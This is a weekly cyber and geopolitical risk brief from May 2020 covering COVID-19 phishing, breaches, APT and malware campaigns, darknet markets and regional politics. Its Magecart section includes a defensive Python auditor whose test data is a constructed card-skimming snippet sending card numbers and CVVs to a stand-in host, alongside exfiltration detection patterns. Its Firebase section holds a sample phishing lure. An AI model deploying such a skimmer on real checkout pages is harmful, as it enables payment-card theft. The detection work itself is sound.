Geopolitical and Cybersecurity Risk Weekly Brief 26 May 2020


COVID-19 Cybersecurity Update

The US Federal Trade Commission (FTC) has warned users about scam coronavirus (COVID-19) contact tracing texts. There has been an increasing number of SMiShing messages asking users to click a malicious link. The FTC claims that clicking the link will download software onto the device, enabling scammers access to personal and financial information. Best practice is to ignore and delete these messages.

Outsourcing company Serco has apologised after accidentally sharing the email addresses of almost 300 coronavirus contact tracers. An employee had used the 'CC' email option instead of the 'BCC' section; the firm is now in violation of data protection rules and at least one member of staff has raised the issue with the Information Commissioner's Office (ICO).

Threat actors have been impersonating the US Navy Federal Credit Union to steal victims' Microsoft Office 365 credentials. The phishing emails use the current economic crisis caused by the coronavirus as a lure and state the user has received USD1,100 due to the pandemic. Instead, the malicious link takes them to a credential-stealing page.

A new Adwind RAT campaign has been targeting Indian co-operative banks using coronavirus as a lure. Attackers can "take over the victim’s device to steal sensitive data like SWIFT logins and customer details and move laterally to launch large scale cyberattacks and financial frauds." The emails present coronavirus guidelines or discuss financial transactions, asking the recipient to download a .zip file which contains the malware.

Microsoft Security Intelligence and other security researchers have revealed a new TrickBot malspam campaign using COVID-19 phishing lures. TrickBot remains one of the most common payloads in coronavirus-related campaigns. The new malspam offers a "personal coronavirus check".

Threat actors have been abusing remote environments, online file sharing and cloud storage tools with COVID-19 lures. One of the companies targeted was a global financial institution, and another was an international law firm. A malicious file is shared with the victim on a file-hosting service, with the file using similar logos to the platforms to create an air of legitimacy. The victim is eventually led to a credential theft site, where they are asked to enter their account information.

A new version of the ZLoader (also known as Zeus Sphinx, Terdot and DELoader) malware has been observed distributing over 100 phishing campaigns since the start of 2020. These have targeted users in the US, Canada, Germany, Poland and Australia with coronavirus-themed lures and invoices. Since the payments in this campaign are initiated from the customer's computer using their correct stolen credentials, the transactions do not raise suspicion with the bank.

New samples of Android Trojans that continue to target Turkey with coronavirus-themed messages have been identified. In these attacks, the threat actors use Android Package files (APKs) to bypass the Google Play Store and download the fake apps on the victim's phone without verification. One APK claims to offer “money refund because of coronavirus” to Turkish users, which if downloaded contains the Cerberus banking Trojan. Other malicious APKs also offer 20GB of free mobile data but contain the Anubis banking Trojan.


Attacks and cybersecurity news

In a statement to the stock market, EasyJet said that it has “been the target of an attack from a highly sophisticated source”. Nine million customers' flight details and personal information are reported to have been stolen, along with 2,200 customers' credit card details. The airline has also notified the UK NCSC and the Information Commissioner’s Office (ICO). EasyJet CEO Johan Lundgren warned customers to remain vigilant for scams linked to COVID-19, admitting that their personal information is now in the hands of cybercriminals.

A new Winnti group campaign is targeting the video game industry in South Korea and Taiwan with a Trojan backdoor, dubbed PipeMon. A massively multiplayer online (MMO) game developer was breached by Winnti. The group was able to compromise the company’s build orchestration server, allowing them to take control of the automated build systems. The Winnti Group, active since at least 2012, is responsible for high-profile supply-chain attacks against the software industry, leading to the distribution of trojanised software (such as CCleaner, ASUS LiveUpdate and multiple video games) that is then used to compromise more victims in other cyber-espionage campaigns.

NSO Group has been found using a spoofed Facebook login page, crafted to look like an internal Facebook security team portal, to lure victims. Once victims log in, they are infected with the Pegasus spyware. The journalists also discovered that a server used by NSO's system to deliver malware was owned by Amazon. Researchers claim that this is another piece of evidence that "NSO has been willing to impersonate Facebook and use U.S.-based infrastructure to launch its malware".


Data breaches, fraud, and vulnerabilities

Data Breaches

All major ransomware strains remain a significant threat. The operators of the Maze ransomware have attacked and leaked data from three US companies, Optimata, Universal Window & Door, and Liberty Title Michigan. The operators of the Sodinokibi (REvil) ransomware have claimed responsibility for attacking and stealing data from FARO Technologies - a US-based company which "designs, develops, manufactures, markets and supports software driven, three-dimensional (3D) measurement, imaging and realization systems."

The Florida Department of Economic Opportunity has reported that the Florida Unemployment System had suffered a data breach after being attacked by an unknown threat actor. The department has notified 98 people that have been impacted by the incident. However, the total number of citizens affected, and the type of data exposed in the breach have yet to be disclosed.

Bank of America has disclosed a security incident which impacted its online platform for processing loan requests filed by US companies for the Paycheck Protection Program (PPP). BoA informed users that some of the data from companies who applied for the loans may have been viewed by other banks or organisations. This incident was blamed on a test platform managed by the US Small Business Administration: applications submitted to the test server were visible to other parties with access to the test platform.

A security researcher has discovered an exposed Elasticsearch instance belonging to Advanced Info Service (AIS), Thailand's largest mobile network operator. The database contained approximately 8.3 billion records, comprising DNS query logs and NetFlow logs for AIS customers. This incident once again demonstrates the difficulty security researchers often face when attempting to notify the responsible party of a data exposure. Had the database held 8.3 billion records of sensitive PII rather than network logs, the researcher would likely have faced the same obstacle, with far more serious repercussions.

Security researcher Bob Diachenko has found the personally identifiable information (PII) of over 13 million families registered with the Mukhya Mantri Parivar Samridhi Yojna (MMPSY) exposed publicly. MMPSY is one of the largest social security programmes in India. This type of sensitive data could allow for a range of fraud and identity theft to be committed under these users' names.

Japan’s defence ministry is investigating a possible leak of the details of a state-of-the-art missile in a large-scale cyber-attack on Mitsubishi Electric. Performance requirements that were sent to several defence-industry companies are believed to have been stolen by the attackers. These were part of the bidding process that the Japanese government offers for defence industry contracts. Mitsubishi did not win the bid.

Fraud

The England and Wales police officer recruitment programme Police Now was attacked between 30 April and 5 May 2020. Threat actors targeted the scheme, which trains graduate detectives for 30 different forces, by sending applicants emails that masqueraded as Police Now and contained a malicious URL. A single Police Now mailbox was compromised and used to send the phishing emails. So far, 73 people have been identified as impacted after contacting the Police Now programme. Investigators found that 63,000 emails were sent from the mailbox in total, so the true number of those affected could be higher.

UK retailer Páramo has fallen victim to a Magecart breach in which a web skimmer sat on its checkout page for the last eight months. Despite regular security scans, Magecart attackers were able to compromise the site’s checkout page and insert a small piece of JavaScript that copied card details as they were entered, before they were passed to PayPal, and sent them to the attacker's server. The data transferred included names, addresses, card numbers and CVV codes.
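The skimmer pattern described above (a short inline script that reads the card fields as they are typed and sends them to a server the merchant does not control) is easiest to catch by baselining every script on the checkout page and triaging anything that was not there before, which is precisely what periodic platform security scans missed for eight months. The Python script below is an added example written for this brief, not code from Páramo, PayPal or any Magecart research team; the checkout page, the first-party host `shop.example`, the skimmer-like snippet and the third-party tag URL are all constructed test data.

```python
import hashlib
import re
from html.parser import HTMLParser

# Heuristics for triaging an inline script that is not in the baseline.
PAYMENT_FIELD_RE = re.compile(
    r"card[-_ ]?(number|num|no)|cvv|cvc|cvn|expir|exp[-_ ]?(month|year|date)", re.I)
EXFIL_SINK_RE = re.compile(
    r"XMLHttpRequest|fetch\s*\(|sendBeacon|new\s+Image\s*\(|\.src\s*=|WebSocket\s*\(")
FORM_HOOK_RE = re.compile(
    r"addEventListener\s*\(\s*['\"](submit|click|change|keyup|input)['\"]|onsubmit|\.submit\s*=")
URL_HOST_RE = re.compile(r"https?://([a-z0-9.-]+)", re.I)

# Hosts the merchant actually controls (assumed value for this example).
FIRST_PARTY_HOSTS = {"shop.example"}

# Constructed checkout page as it looked when it was known to be clean.
CLEAN_CHECKOUT_HTML = """<html><body>
<form id="checkout"><input id="card-number"><input id="cvv"><button>Pay</button></form>
<script src="https://shop.example/static/checkout.js"></script>
<script>
  // Benign first-party snippet: no payment fields, no network sink.
  window.dataLayer = window.dataLayer || [];
  window.dataLayer.push({event: "checkout_view"});
</script>
</body></html>"""

# The same page after a constructed skimmer-like snippet and an unknown third-party
# tag were injected. The snippet is detection test data only.
SAMPLE_CHECKOUT_HTML = CLEAN_CHECKOUT_HTML.replace("</body>", """<script>
  document.getElementById("checkout").addEventListener("submit", function () {
    var n = document.getElementById("card-number").value;
    var c = document.getElementById("cvv").value;
    new Image().src = "https://stats.example.invalid/p?d=" + btoa(n + "|" + c);
  });
</script>
<script src="https://cdn.thirdparty.invalid/tag.js"></script>
</body>""")


class _ScriptExtractor(HTMLParser):
    """Collects (src, inline_body) for every <script> element in document order."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._src = None
        self._buf = None

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._buf is not None:
            self.scripts.append((self._src, "".join(self._buf).strip()))
            self._src, self._buf = None, None


def extract_scripts(html):
    parser = _ScriptExtractor()
    parser.feed(html)
    parser.close()
    return parser.scripts


def script_id(src, body):
    """External scripts are identified by URL, inline scripts by content hash."""
    if src:
        return "src:" + src
    return "sha256:" + hashlib.sha256(body.encode("utf-8")).hexdigest()


def build_baseline(clean_html):
    """Allowlist captured from a known-clean copy of the page (e.g. a fresh build)."""
    return {script_id(src, body) for src, body in extract_scripts(clean_html)}


def audit_checkout_page(html, baseline, first_party_hosts):
    """Return one finding per script that is absent from the baseline."""
    findings = []
    for src, body in extract_scripts(html):
        sid = script_id(src, body)
        if sid in baseline:
            continue
        reasons = []
        if src:
            match = URL_HOST_RE.search(src)
            host = match.group(1).lower() if match else ""
            if host and host not in first_party_hosts:
                reasons.append("third-party script host: " + host)
        else:
            if PAYMENT_FIELD_RE.search(body):
                reasons.append("reads payment fields")
            if EXFIL_SINK_RE.search(body):
                reasons.append("network send sink")
            if FORM_HOOK_RE.search(body):
                reasons.append("hooks form submission")
            for host in sorted({h.lower() for h in URL_HOST_RE.findall(body)}):
                if host not in first_party_hosts:
                    reasons.append("contacts non-first-party host: " + host)
        # Card-field access combined with a send sink, or any new third-party host,
        # is the skimmer signature; anything else that is new still deserves a look.
        high = ({"reads payment fields", "network send sink"} <= set(reasons)
                or any(r.startswith("third-party") for r in reasons))
        findings.append({"id": sid, "severity": "high" if high else "review", "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_checkout_page(SAMPLE_CHECKOUT_HTML, build_baseline(CLEAN_CHECKOUT_HTML), FIRST_PARTY_HOSTS):
        print(f["severity"], f["id"], "; ".join(f["reasons"]))
```

Run it on a schedule against a fetched copy of the live checkout page, with the baseline captured from a clean build rather than from production. Any unexpected inline script or new external host then surfaces as a finding regardless of whether the hosting platform's own scans pass. The heuristic matches are a prompt for review, not proof of compromise: legitimate payment widgets also read card fields and make network calls, which is why the baseline, not the heuristics, does most of the work.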

Earlier in the week, the FBI warned that Magecart threat actors were exploiting a three-year-old vulnerability, tracked as CVE-2017-7391, in Magento Mass Import (MAGMI), a Magento plugin. The bug can be abused to take control of online stores and plant web skimmers.

A new phishing campaign is leveraging a fake notification from AT&T to disseminate malware. The campaign plays on users' fears of fraudulent activity taking place on their accounts. Notifications pose as purchase receipts or tracking information to prompt users to investigate the charges. Each contains a link that installs malware onto the device. The exact type of malware used in this campaign has not been disclosed. However, it would likely allow the attackers to steal sensitive personal information and potentially hijack the user’s device.

A new series of phishing attacks has been using Google Firebase storage URLs to trick victims and bypass Secure Email Gateways (SEGs). The phishing email encourages users to click on a Firebase link which takes them to a fake login page for various applications hosted on Firebase. These have included Microsoft Office 365, Outlook, Mozilla Thunderbird, Webmail and Bank of America. Once a user enters their login details, the information is harvested and exfiltrated to the attacker.
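A link hosted on Firebase passes a gateway's reputation check because the parent domain belongs to Google; the useful signal is the combination of a shared-hosting link with a brand name and credential language in the same message, not the domain on its own. The Python triage below is an added example, not a product rule or code from the researchers cited above; the Firebase hosting domains `firebasestorage.googleapis.com`, `web.app` and `firebaseapp.com` are assumed from general knowledge of the platform rather than taken from the brief, and both sample emails (sender domains, bucket name and all) are constructed.

```python
import re
from email import message_from_string
from urllib.parse import unquote, urlparse

# Google-owned parents under which anyone can publish arbitrary content.
# Assumed list for this example; the brief only says "Google Firebase storage URLs".
SHARED_HOSTING_DOMAINS = ("firebasestorage.googleapis.com", "web.app", "firebaseapp.com")
# Brands the brief reports being imitated, plus generic credential wording.
BRAND_TERMS = ("office365", "office 365", "outlook", "microsoft", "thunderbird",
               "webmail", "bankofamerica", "bank of america")
LOGIN_TERMS = ("login", "log in", "sign in", "signin", "verify", "password", "mailbox")
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)

# Constructed lure: generic "mailbox full" pretext, Office 365 branding, Firebase link.
SAMPLE_LURE_EML = """\
From: IT Helpdesk <helpdesk@constructed-sender.invalid>
To: user@victim-org.invalid
Subject: Action required: mailbox storage almost full
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Your Office 365 mailbox is almost full. Sign in to review:
https://firebasestorage.googleapis.com/v0/b/constructed-bucket.appspot.com/o/office365%2Flogin.html?alt=media

--b1
Content-Type: text/html; charset="utf-8"

<html><body><p>Your Office 365 mailbox is almost full.</p>
<a href="https://firebasestorage.googleapis.com/v0/b/constructed-bucket.appspot.com/o/office365%2Flogin.html?alt=media">Sign in to review</a>
</body></html>
--b1--
"""

# Constructed benign message with an ordinary vendor link, for comparison.
SAMPLE_BENIGN_EML = """\
From: Release Team <releases@constructed-vendor.invalid>
To: user@victim-org.invalid
Subject: Release notes 4.2
Content-Type: text/plain; charset="utf-8"

Release notes are at https://docs.constructed-vendor.invalid/4.2/notes.html
"""


def _text_parts(msg):
    """Yield the decoded text/plain and text/html bodies of a parsed message."""
    for part in msg.walk():
        if part.get_content_type() in ("text/plain", "text/html"):
            raw = part.get_payload(decode=True) or b""
            yield raw.decode(part.get_content_charset() or "utf-8", "replace")


def on_shared_hosting(host):
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in SHARED_HOSTING_DOMAINS)


def triage_message(raw_eml):
    """Score a raw RFC 822 message; returns verdict, score and per-link evidence."""
    msg = message_from_string(raw_eml)
    parts = list(_text_parts(msg))
    body_text = " ".join(parts).lower()
    hits = []
    for url in sorted({u for p in parts for u in URL_RE.findall(p)}):
        parsed = urlparse(url)
        host = (parsed.hostname or "").lower()
        if not on_shared_hosting(host):
            continue
        # Brand names are often hidden in the percent-encoded object path.
        url_text = unquote(parsed.path + "?" + parsed.query).lower()
        brands = [b for b in BRAND_TERMS if b in url_text or b in body_text]
        login = [t for t in LOGIN_TERMS if t in url_text or t in body_text]
        hits.append({"url": url, "host": host, "brands": brands, "login_terms": login})
    # One point for the shared-hosting link, one for a brand name, one for credential
    # wording: the link alone is weak evidence, all three together is the lure.
    worst = max((1 + bool(h["brands"]) + bool(h["login_terms"]) for h in hits), default=0)
    verdict = "quarantine" if worst >= 3 else ("review" if worst else "allow")
    return {"verdict": verdict, "score": worst, "hits": hits}


if __name__ == "__main__":
    for name, eml in (("lure", SAMPLE_LURE_EML), ("benign", SAMPLE_BENIGN_EML)):
        print(name, triage_message(eml))
```

Wired into a gateway as a post-reputation rule, this scores the lure at 3 (quarantine) and the vendor notice at 0 (allow). The design point is that a shared-hosting link by itself only earns a "review"; blocking the Firebase domains outright would also block legitimate app links, whereas requiring the brand and credential terms as well targets the specific pattern the brief describes.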

Threat actors are using new techniques to bypass security controls in Office 365. One of these includes adding a CAPTCHA page to the chain of redirects that ends on a phishing template for login credentials. The phishing emails claim to be from the US Supreme Court and masquerade as a subpoena for a hearing. The threat actors put effort into making this campaign appear credible. Users should be suspicious of messages about an urgent task, especially since many of these phishing attempts are currently using coronavirus-themed lures to add a sense of fear and urgency to campaigns.

Vulnerabilities

Threat group HackersOfSavior has defaced thousands of Israeli websites using a WordPress plugin called uPress. Over 2,000 sites have been compromised to display an anti-Israel and anti-Zionist message. They were also injected with malicious code seeking permission to access visitors’ webcams. uPress stated that the hackers exploited a vulnerability in their plugin to compromise Israeli sites hosted on the platform.

We recommend updating the products below as soon as possible in line with your organisation’s product update schedule:

  • Microsoft Windows Docker Desktop Service – CVE-2020-11492, a privilege escalation vulnerability
  • Multiple vulnerabilities in Schneider Electric and Sensormatic Electronics ICS products
  • Authentication bypass vulnerability in certain Epson projectors
  • Memory corruption vulnerability in GNU glibc ARMv7
  • Critical pre-authentication remote code execution vulnerability in Cisco Unified Contact Center Express
  • VMware has issued a security advisory for a high-risk code injection vulnerability in its own products
  • NXNSAttack, a new vulnerability in the DNS protocol that would allow attackers to turn small requests into much larger payloads, overburdening resolvers
  • US CISA issued two security advisories regarding vulnerabilities in ICS products belonging to Emerson and Rockwell Automation
  • New vulnerabilities disclosed in several Adobe products
  • Five unpatched zero-days have been found in Microsoft Windows, three of which could allow an attacker to escalate privileges on an affected system
  • Multiple remote code execution vulnerabilities in Nitro Pro PDF

APT Activity and Malware Campaigns

APT activity

New information about the Ke3chang group (aka APT15) and its involvement in a recent attack campaign has been disclosed. Three new samples linked to the group were uploaded to VirusTotal in mid-May 2020: they share the same code as older samples Ketrican and Okrum. The new malware has been dubbed Ketrum. Ke3chang is a Chinese threat group that reportedly operates on behalf of the government. It has been linked to several high-profile attacks and has a global reach. Examples include attacks against European ministries, Indian embassies, and British military contractors.

Okrum and Ketrican were deployed in the group’s last campaign in 2019 against diplomatic targets in Slovakia, Belgium, Chile, Guatemala and Brazil. They have been used since 2015 to the present day, with various updated versions noted by researchers. It is likely that the Ketrum backdoor is being similarly deployed.

A new threat actor, dubbed LeeryTurtle, is targeting cryptocurrency exchange companies worldwide. The group has been active since at least 2017, using spear-phishing to deliver custom-made malware. LeeryTurtle does not appear to focus on any particular region, but it mainly targets those in technical and executive roles. The group employs sophisticated reconnaissance techniques - sending decoy emails with non-malicious attachments to monitor which targets open and download them. Research into the group also suggests that they target specific users and conduct extensive research into their personal lives to aid social engineering efforts.

A cyberespionage campaign linked to Iranian APT Chafer has been identified. Victims include air transportation firms and government agencies in the Middle East. Interestingly, these attacks were only carried out during the weekends and leveraged attacker-created user accounts. This technique enabled Chafer to maintain a presence on one compromised system for over 18 months. Both Kuwait and Saudi Arabia were targeted in this campaign.

A Nigerian business email compromise (BEC) group, ScatteredCanary, has been targeting US unemployment systems and coronavirus relief funds provided under the CARES Act. The group has used the IRS and state unemployment websites to file hundreds of fraudulent claims on behalf of US citizens and has fraudulently received benefit payments. This research comes just days after the US Secret Service issued an alert regarding multiple fraudulent unemployment claims being filed by Nigerian threat actors. This alert listed Washington as the most targeted state, followed by North Carolina, Massachusetts, Rhode Island, Oklahoma, Wyoming, and Florida. It is highly likely that ScatteredCanary is at least one of the groups to which the alert refers.

Iranian cyberespionage group Greenbug has been actively targeting telecommunications companies in South Asia since at least April 2019; the most recent attacks were observed in April this year. The group uses emails as an initial infection vector followed by the Covenant post-exploitation framework to gain an initial foothold in target organisations.

Malware

Researchers have identified a new Android malware with a variety of malicious features that include stealing funds from the victim's bank account or cryptocurrency wallet. The malware is called "Defensor ID" and has English and Portuguese versions available on the Google Play Store. It successfully bypassed the security checks on the Play Store by removing all potentially malicious functionalities but one, abusing Android's Accessibility Service.

Operators of the RagnarLocker ransomware are using a new method to evade detection. It deploys as a full virtual machine on each targeted device to hide the ransomware from view. In a recent attack, the ransomware was deployed inside an Oracle VirtualBox Windows XP virtual machine. Running the ransomware inside the VM allows the processes and behaviours to run unhindered, because they are not scanned by security software.

Researchers have observed a new bot with a similar design to the Zeus banking Trojan (aka ZLoader, Zeus Sphinx, Terdot and DELoader). Silent Night, as researchers called it, is being distributed via COVID-19 lures to victims in North America. Elsewhere, a separate ZLoader campaign is being disseminated using similar tactics in Canada, Germany, Poland and Australia.

A new malware campaign has been discovered spreading a modified version of DenDroid, dubbed WolfRAT. The campaign is targeting Android users in Thailand on WhatsApp, Facebook Messenger, and Line. WolfRAT has been linked to an organised cybercrime group - WolfResearch - which specialises in developing interception and cyber-espionage malware.

Darknet

The darknet market Europa has gone offline. Earlier this week, the market's homepage was replaced by a seizure notice mimicking those seen after the FBI took down AlphaBay. However, users soon detected multiple errors in the takedown notice, indicating it is likely fake. Many users believe this was a transparent attempt to provide cover for an exit scam, but this has yet to be confirmed. Europa was a relatively small market and so its exit (if that is what has occurred) is unlikely to have a significant impact. However, Europa was noteworthy because it was one of the few current markets to allow the sale of firearms and fentanyl. Consequently, vendors selling these products will now have to find a new market on which to sell their wares.

Empire is currently experiencing severe issues related to market uptime. Since the Empire admin partnered with the Dread admin on a DDoS mitigation system, their uptime has been relatively consistent. However, Empire market was unavailable for much of last week. This is likely to have been caused by a DDoS attack, suggesting the attackers have found a way to circumvent the mitigation system. It remains unclear whether rival markets or law enforcement are behind these attacks, but Empire’s prominence means the DDoS attacks are having a significant impact.

Since it first began gaining traction as a potential treatment for COVID-19, the demand for hydroxychloroquine has increased rapidly. This is also noticeable on the darknet, where Cyjax has observed both the quantity and price of this drug rising steeply. If markets are now allowing legitimate vendors to sell hydroxychloroquine, then it is possible this drug will see a resurgence across the darknet. Clearly the demand exists, despite the ongoing public debate concerning the effectiveness of the drug as a COVID-19 treatment. However, the barriers of sourcing and the stigma of potential scammers may limit the number of legitimate vendors who choose to sell it.

Cyjax identified a post on the darknet forum Exploit[.]in from the Cerberus operators, stating Cerberus v2 is now available to purchase. The operators previously notified customers that Cerberus v2 was in the testing stage, but this latest post suggests it is now fully operational. Support for Cerberus v1 has now ended; it is free for existing customers to upgrade to Cerberus v2. Considering Cerberus is one of the most popular banking Trojans, we expect v2 to be rapidly adopted and integrated into cybercrime operations.


COVID-19 Geopolitical Threats and Impacts

Americas

In a statement released on 16 May, the Ecuadorian ministry of mines and non-renewable natural resources confirmed the imminent re-start of mining operations after the government’s committee for emergency operations, or COE, approved their resumption. The announcement has prompted concern among some residents who live near mines over whether the resumption of mining will increase the spread of COVID-19. Ecuador has been one of the worst-affected countries in Latin America. The move, however, marks a major development in the gradual normalisation of mining companies’ operations in Ecuador. Companies should resume operations under strict sanitary protocols and social-distancing guidelines.

On 19 May, the US Department of the Treasury’s Office of Foreign Assets Control (OFAC) imposed sanctions on China-based logistics company Shanghai Saint Logistics for acting as a general sales agent (GSA) for blacklisted Iranian airline Mahan Air. The measure freezes any US-held assets of Shanghai Saint Logistics and generally prohibits US persons from doing business with the company. Mahan Air has been under US sanctions since 2011, imposed over its links to Iran’s Islamic Revolutionary Guard Corps (IRGC), which the US considers a terrorist organisation. The timing of the sanctions against a China-based company amid tensions over the COVID-19 crisis indicates that commercial retaliation against Beijing was likely an important consideration. In the short-to-medium term, companies should anticipate increased enforcement of US sanctions, including against companies partnering with sanctioned entities in countries including Iran, Syria, and Venezuela.

Prior to this, on 15 May, the US Department of Commerce announced new export controls targeting Chinese technology giant Huawei’s access to semiconductors made abroad with US technology. Under the new rules, overseas chip makers using US technology and software in semiconductor design are barred from supplying Huawei without the permission of US authorities. The new rules came into force on 15 May; however, an exemption has been granted to products made or shipped within the next 120 days to mitigate supply-chain disruption. The move adds to prior US restrictions on Huawei imposed amid an intensifying Sino-US trade and geopolitical rivalry, and accusations from Washington over the company’s equipment being used for espionage on behalf of China. The measure also comes amid worsening Sino-US political relations due to the COVID-19 pandemic.

Taiwan Semiconductor Manufacturing Company (TSMC), the world’s most valuable semiconductor company, has announced it will build a chip factory in Arizona amid US government efforts to bolster domestic manufacturing of advanced technology products. TSMC said that construction on the USD12 billion plant would begin in 2021, with production envisaged to begin in 2024. TSMC’s announcement marks a successful example of the US government’s efforts to enhance the domestic production of components in advanced technologies.

APAC

Australia’s iron ore exports to China may be affected by changes in China’s customs procedures due to begin in June. China has already imposed tariffs on or blocked imports of Australian beef and barley in an explicit response to Canberra’s efforts to launch an international investigation into the origins of the COVID-19 pandemic. Beijing opposed the move, but the World Health Organization subsequently agreed to an inquiry into the international response to the pandemic, a compromise seen as reflecting China’s efforts to distance itself as a source of the disease. China’s use of its powerful trading position is a long-established foreign policy tactic to penalise or reward other countries according to their conduct. Western companies in China should prepare for further moves by the authorities against their expatriate staff and operations in the six-month outlook.

Reuters reported on 18 May that the Myanmar police had seized a huge quantity of illicit drugs, including the largest ever amount of the synthetic opioid fentanyl, which to date has been largely absent among illicit narcotic users outside North America. No date was given for the seizure, which also resulted in at least 140 arrests. Government agencies in the US and Canada report that the illicit use of fentanyl and its derivatives has led to more than 130,000 overdose deaths in North America over the past five years. There are now concerns that Asia-based organised criminal groups are seeking to create new markets for these powerful and exceptionally addictive opioids in Asia and Europe.

On 14 May US President Donald Trump indicated Washington could ‘cut off’ the relationship with Beijing. While Trump did not specify what this might mean, his comment marked an intensification of his rhetoric over China’s alleged concealment of the COVID-19 outbreak. China’s official response has so far been muted, although some state-controlled media have suggested Trump is suffering from psychological problems. Barely a day now passes without the important China/US trading and diplomatic relationship coming under renewed pressure. As there is little likelihood either government will seek to lower the political temperature due to domestic considerations, further strains can be expected to develop over the coming weeks.

The Asian Development Bank (ADB) warned over the weekend that the coronavirus pandemic could cost the Philippines up to USD24 billion in economic losses if the outbreak lasts for six months and the government’s efforts to offset its impact prove ineffective. The ADB noted that the government’s USD16.7 billion economic package, intended to mitigate the cost of the pandemic by supporting businesses and individuals, is far below those of other regional countries, notably Thailand and Indonesia. In a further indication of the pandemic’s threat to the country, a research group reports that the amount of money remitted by an estimated 10 million overseas Filipino workers, or OFWs, is set to fall by around USD6 billion this year against the USD30 billion sent home in 2019. OFW remittances, which help support more than one in 10 local households, last year comprised almost 8 per cent of GDP.

Europe

On 19 May, the UK government announced a new tariff regime – referred to as the ‘UK Global Tariff’ – to replace the EU’s external tariff from January 2021. A 10 per cent duty on car imports will continue to apply, but tariffs on GBP30 billion worth of goods destined for UK supply chains will be removed. Duties on sensitive sectors such as agriculture and fishing will remain. Government representatives said the tariff will be a simplified version of the EU’s common tariff and will apply to all countries with which the UK has no trade agreement. Tariffs will also be cut on environmental products such as LED lamps and gas turbines.

Under the new terms, goods currently facing below 3 per cent tariffs imported from countries that do not have a trade deal with the UK will enjoy zero-tariffs. The conditions will also apply on imports from the EU if both sides fail to reach a comprehensive trade agreement before a December 2020 deadline. Indeed, the benefits of the tariff will be limited in the absence of a comprehensive trade deal with the EU. Many non-EU firms export to the UK to take advantage of unhindered access to the mainland European market. While the UK aims to replicate the existing trade benefits enjoyed with EU membership, this presently seems unlikely due to a stalemate in negotiations. Notably, other countries are not required to lower their own tariffs to UK imports. Firms importing goods into the UK should assess the impact of the new tariff regime on operations and factor sourcing strategies accordingly.

The Polish government has approved new rules aimed at deterring non-EU firms from acquiring Polish companies deemed strategically important that have been adversely affected by the COVID-19 crisis. The regulations, which will be binding for two years and apply to firms with over EUR10 million in two financial years before a planned takeover, are part of a government rescue package worth over PLN300 billion (around EUR66.3 billion) to boost the economy. The UOKiK competition body will be responsible for overseeing planned takeovers. This forms part of an EU-wide trend in which governments are implementing new controls to prevent hostile takeovers by overseas investors, particularly entities with links to foreign states. France and Germany have implemented similar measures. Sectors such as defence, technology and healthcare will attract heightened regulatory scrutiny.

French finance minister, Bruno Le Maire, said on 14 May that the government would move ahead to implement a tax on major technology firms this year, regardless of any progress on setting up an international levy. During a conference call, Le Maire said, “never has a digital tax been more legitimate and more necessary.” Meanwhile, the Czech Republic has indicated that it could delay introducing its own digital tax until 2021. A number of other EU countries, including Italy, have either introduced or plan to implement new digital taxation. Given that the current US administration sees tariffs as a key tool to achieve foreign policy and trade objectives, Washington will probably impose tariffs on countries that have introduced or are planning a digital tax. Companies relying on EU-US trade should factor the impact of tariffs on strategic planning.

On 12 May, the Riigikogu – Estonia’s lower house of parliament – passed amendments to a telecommunications law covering the development of future networks. In a statement, the Riigikogu said the legislation was needed to ensure the ‘quality of networks, minimise the impact of cyber-attacks, and prevent political manipulations’. While not explicitly mentioned in the legislation, the amendments are probably aimed at increasing political scrutiny of Huawei, a major telecommunications firm with alleged close ties to the Chinese government. This comes as the country, which has a thriving technology sector, prepares to roll out 5G networks. The issue of Huawei’s involvement in 5G has become a conundrum for countries across the EU. Washington has pressured close allies to impose an outright ban on the firm, but some, including the UK, have resisted and opted for a more moderate approach. The legislation in Estonia will create challenges and additional requirements for telecommunications firms, particularly when sourcing equipment for new infrastructure.

MENA and Central Asia

Human rights groups claimed on 21 May that Algeria had sentenced a number of opposition activists to jail over Facebook posts. Rights groups and anti-government activists have denounced the convictions as the latest sign of increased repression since the COVID-19 pandemic stifled widespread popular mobilisations in March. Weekly anti-government protests had been taking place since February 2019; after bringing down former president Abdelaziz Bouteflika in April 2019 the protesters continued demanding an overhaul of Algeria’s governance system. The unrest largely came to a halt as authorities banned marches as part of movement restrictions put in place to contain the spread of COVID-19. Activists say the government has exploited the outbreak to intensify its crackdown, continuing to target opponents, journalists, independent media and internet users. Staff managers should monitor the situation and anticipate elevated security presence in the vicinity of protests.

Lebanese media reported protests in front of an unidentified electricity company and the Deir Ammar Power Plant. Lebanon has suffered from power shortages for decades, following years of civil unrest, inertia at the policy-making level, and political instability. Lebanon has a total capacity of just over 2,000 MW compared to peak demand of 3,400 MW. In April 2019, the government approved a long-awaited plan to reform its electricity sector, although little progress has been made and the situation has only worsened due to the country’s financial crisis that has been exacerbated by the COVID-19 pandemic. Additional protests are likely to target Lebanon’s energy sector including at electricity companies and power stations in the coming three- to six-month period.

On 18 May, Libyan forces allied with the UN-backed Government of National Accord (GNA) seized control of the Watiya airbase, some 144km south of the capital Tripoli, from Field Marshal Khalifa Haftar's Libyan National Army (LNA). Small-scale clashes were reported between GNA and LNA forces before the LNA withdrew, reportedly for tactical reasons. Military spokesman Mohamed Gnunu confirmed in a tweet that the GNA had taken over the entire base. The announcement marks a major setback for Haftar, who had held the airbase since 2014, and comes after a month-long counter-offensive by the GNA and its allies that has driven the LNA out of much of Libya's western coast.

Haftar's foreign backers will likely aim to increase their support in the coming one- to two-month period as a bulwark against further GNA advances. Meanwhile, fighting is likely to continue, as the capture of Watiya will free up GNA troops to put pressure on Haftar's forces south of Tripoli. Security managers should monitor the situation and ensure that travel is conducted with strict security protocols in place. Professional security advice and support should be sought prior to travel.

